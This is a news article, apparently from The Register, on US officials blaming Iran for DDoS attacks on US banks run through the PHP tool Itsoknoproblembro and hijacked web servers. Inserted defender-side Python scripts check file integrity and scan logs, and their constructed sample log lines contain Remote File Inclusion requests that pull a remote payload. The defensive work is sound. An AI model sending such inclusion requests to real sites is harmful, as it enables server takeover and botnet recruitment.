US gov blames Iran for cyberattacks on American banks

Itsoknoproblembro and the bRobots

Denial-of-service attacks against US banks' web systems were the work of Iran rather than Islamic activists, says a former American government official.

A group calling itself the Izz ad-Din al-Qassam Cyber Fighters claimed responsibility for two waves of cyber-attacks against US banks, including US Bancorp, Bank of America, Citigroup and Wells Fargo, that took place in September and December. The stated reason for the "protest" attacks was religious outrage over the continuing presence on YouTube of the inflammatory Innocence of Muslims video.

James A Lewis of the Center for Strategic and International Studies in Washington told the New York Times that the attacks were actually the work of Iran, rather than outraged hacktivists. He reckons the aim was actually retaliation over the deployment of Stuxnet and other cyberweapons against Iran as well as economic sanctions.

Security researchers at Arbor Networks concluded last month that in both cases attack traffic was launched from insecure websites rather than malware-infected PCs. Compromised PHP web applications and insecure WordPress installations were pressed into service as part of a PHP web server botnet, controlled by tools such as bRobot.

The skill involved in putting together the attacks, as well as the use of server-based resources, has apparently convinced US government officials that a state-sponsored entity, namely Iran, rather than hacktivists is behind the attacks. “There is no doubt within the US government that Iran is behind these attacks,” Lewis, a former official in the state and commerce departments, told the NYT. Lewis points to the volume of traffic involved in the US bank attacks (“multiple times” the amount that Russia directed at Estonia in 2007) in attempting to substantiate his argument, but as the NYT points out, "American officials have not offered any technical evidence to back up their claims".

Security vendors are able to say that the attacks against US banks are fairly sophisticated but cannot pinpoint who developed them. “The scale, the scope and the effectiveness of these attacks have been unprecedented,” Carl Herberger, vice president of security solutions at Israel-based security firm Radware, told the NYT. “There have never been this many financial institutions under this much duress.”

Researchers at Radware discovered that cloud services and public web hosting servers* had been infected with a strain of malware, called Itsoknoproblembro. "The malware has existed for years, but the banking attacks were the first time it used data centers to attack external victims," the NYT reports, adding that Itsoknoproblembro was designed to be difficult if not impossible to trace back to command and control systems. Attackers used infected servers to disgorge attack traffic at each banking site until it slowed or collapsed, according to Radware. Peak attack traffic against US banks hit 70 Gbps.

An entry on Radware's website explains that Itsoknoproblembro is a PHP-based hacker tool that has recently been customised to serve in DDoS attacks.

The 'itsoknoproblembro' tool was designed and implemented as a general purpose PHP script injected into a victim’s machine allowing the attacker to upload and execute arbitrary Perl scripts on the target’s machine.

The 'itsoknoproblembro' script injects an encrypted payload, in order to bypass IPS and Malware gateways into the website main file index.php, allowing the attacker to upload new Perl scripts at any time.

Initial server infection is usually done by using the well-known Remote File Inclusion (RFI) technique. By uploading Perl scripts that run different DoS flood vectors, the server might act as a bot in a DDoS botnet army.

Although originally designed for general purpose, some variants of this tool found in the wild were customized to act as a proprietary DDoS tool, implementing the flood vector logics inside without the need to upload additional scripts.
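As an added defensive check, not code from Radware or The Register: because the infection described above lands in a site's index.php and drops extra Perl scripts, a script-file integrity baseline is one straightforward way to notice it. The code hashes script files under a web root, keeps the hashes as a baseline, and reports files modified, added or removed since then. The web root, file names, and the "injected" text are all constructed for the demonstration and contain no real payload.

```python
import hashlib
import json
import tempfile
from pathlib import Path

# Added example: minimal file-integrity baseline for a web root.
# A payload written into index.php, or a dropped .pl file, shows up as a diff
# against the last known-good hash set.

SCRIPT_EXTENSIONS = (".php", ".pl", ".inc")  # assumption: the file types worth watching


def hash_file(path: Path) -> str:
    """SHA-256 of a file, read in chunks so large files do not need to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(webroot: Path, extensions=SCRIPT_EXTENSIONS) -> dict:
    """Map each script file (path relative to webroot) to its hash."""
    baseline = {}
    for path in sorted(webroot.rglob("*")):
        if path.is_file() and path.suffix in extensions:
            baseline[str(path.relative_to(webroot))] = hash_file(path)
    return baseline


def check_against_baseline(webroot: Path, baseline: dict) -> dict:
    """Compare the current tree with a saved baseline; return the three kinds of drift."""
    current = build_baseline(webroot)
    return {
        "modified": sorted(p for p in baseline if p in current and current[p] != baseline[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def demo() -> dict:
    """Constructed scenario: take a clean baseline, then simulate the drift an infection causes."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.php").write_text("<?php echo 'hello'; ?>\n")
        (root / "lib").mkdir()
        (root / "lib" / "db.php").write_text("<?php // db helpers ?>\n")
        baseline = build_baseline(root)
        # The baseline would normally be stored off-box; json keeps it readable.
        saved = json.loads(json.dumps(baseline))
        # Simulated drift: text appended to index.php and a new Perl file. Both are
        # placeholders, not real malware.
        with (root / "index.php").open("a") as f:
            f.write("<?php /* PLACEHOLDER appended block */ ?>\n")
        (root / "x.pl").write_text("#!/usr/bin/perl\n# placeholder dropped script\n")
        return check_against_baseline(root, saved)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Run on a real host, the baseline should be taken from a known-clean deployment and stored somewhere the web server's own user cannot write, otherwise an intruder with the same access that planted the payload can simply re-baseline.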

DDoS protection service firm Prolexic last week launched a suite of Snort rules and a log analysis tool to defend against itsoknoproblembro.

It also links the threat to attacks against the US banking industry. But the tool has also been used against the energy and hosting provider industries. "The attack vectors include POST, GET, TCP and UDP floods, with and without proxies, including a so-called Kamikaze GET flood script that can repeatedly relaunch automated attacks," according to a statement by Prolexic.
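As an added, defender-side illustration (not the Prolexic tool, and not code from the article), here is a small log-analysis script of the kind described: it parses Apache combined-format access log lines, flags requests whose query parameters carry a remote URL (how the RFI infection path Radware describes shows up in a log), and flags source addresses issuing abnormally many GET or POST requests in a short window (the flood vectors Prolexic lists). All log lines and IP addresses are constructed, and the threshold of 100 requests per 10 seconds is an assumption chosen for the example.

```python
import re
from collections import Counter
from datetime import datetime
from urllib.parse import parse_qsl, urlsplit

# Apache/nginx "combined" access log format; only the fields the checks need are captured.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# A Remote File Inclusion attempt typically appears as a query parameter whose value
# names a remote script, i.e. begins with one of these schemes.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "php://", "data:")

# Constructed sample log lines (documentation-range IPs); not taken from any real server.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2013:10:00:01 +0000] "GET /index.php?page=http://198.51.100.9/payload.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jan/2013:10:00:02 +0000] "GET /gallery.php?src=HTTP://198.51.100.9/a.php HTTP/1.1" 200 128 "-" "Mozilla/5.0"
198.51.100.20 - - [10/Jan/2013:10:00:05 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""


def constructed_flood_lines(ip="192.0.2.55", count=150):
    """Constructed POST flood: `count` requests from one address, all within ten seconds."""
    return [
        f'{ip} - - [10/Jan/2013:10:00:{i % 10:02d} +0000] "POST /login.php HTTP/1.1" 200 64 "-" "curl/7.29"'
        for i in range(count)
    ]


def parse_log(text):
    """Parse combined-format lines into dicts; lines that do not match are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
        entries.append(e)
    return entries


def find_rfi_attempts(entries):
    """Return (ip, path, parameter, value) for each request whose query carries a remote URL."""
    hits = []
    for e in entries:
        parts = urlsplit(e["target"])
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if value.lower().startswith(REMOTE_SCHEMES):
                hits.append((e["ip"], parts.path, name, value))
    return hits


def find_floods(entries, window_seconds=10, threshold=100):
    """Return (ip, method, peak_count) for sources exceeding `threshold` requests in one window."""
    buckets = Counter()
    for e in entries:
        window = int(e["ts"].timestamp()) // window_seconds
        buckets[(e["ip"], e["method"], window)] += 1
    peak = {}
    for (ip, method, _), n in buckets.items():
        peak[(ip, method)] = max(peak.get((ip, method), 0), n)
    return sorted((ip, method, n) for (ip, method), n in peak.items() if n > threshold)


def analyze_log(text):
    """Run both checks over raw log text."""
    entries = parse_log(text)
    return {"rfi": find_rfi_attempts(entries), "floods": find_floods(entries)}


def demo():
    """Both checks over the constructed sample plus a constructed POST flood."""
    return analyze_log(SAMPLE_LOG + "\n".join(constructed_flood_lines()))


if __name__ == "__main__":
    for kind, findings in demo().items():
        print(kind, *findings, sep="\n  ")
```

Fixed windows are deliberately simple; a flood that straddles a window boundary can be undercounted, so a production tool would use a sliding window and would also tune the threshold to the site's normal per-client rate. The RFI check catches the attempt in the access log regardless of whether the include succeeded, which is useful for triage after the fact.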

Using a cloud-based system to launch denial of service attacks rather than botnet networks of compromised PCs shows that whoever is behind the attacks is keeping up with the latest trends in technology. It's hardly evidence of state involvement, at least by itself. There's nothing in what Prolexic, Radware or Arbor are saying to suggest the latest attacks are state-sponsored, much less pointing the finger of blame at Iran.

Nonetheless, unnamed US intelligence officials appear adamant that the Izz ad-Din al-Qassam Cyber Fighters is actually a cover for Iran. ®

Bootnote

Infected web servers are called bRobots by both Radware and Prolexic. This naming convention differentiates pwned servers from the compromised PCs (zombies, bots or drones) in conventional botnet networks.
